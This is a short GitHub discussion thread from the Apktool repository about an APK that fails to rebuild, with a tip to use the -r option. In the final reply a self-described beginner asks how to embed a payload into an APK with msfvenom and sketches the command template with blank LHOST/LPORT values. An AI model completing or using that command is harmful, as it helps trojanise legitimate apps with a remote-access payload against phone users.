### DISCUSSION TITLE
Unable to rebuild apk with apktool

### DISCUSSION THREAD

**Discussion by RahulTarafder** [iBotPeaches/Apktool#3547] [Ideas]
![Screenshot_2024_0320_102924](https://github.com/iBotPeaches/Apktool/assets/109901628/8f61fff0-5b8d-48db-b569-ab48d2e8c652)

**Comment by arjun-singh-opkey** [comment]
use -r option that will not decompile resources

**Reply by semeer37** [reply]
What about this
![Screenshot_2024-08-18-01-30-40-72_84d3000e3f4017145260f7618db1d683](https://github.com/user-attachments/assets/27522731-f1e0-424f-9e3c-917ec5846b55)

**Reply by semeer37** [reply]
What if I am embedding payload to apk using msfvenom, what would be the command(beginner-alert) ex: msfvenom -p "payload" -x "original apk" -o "output apk"  LHOST=    LPORT =
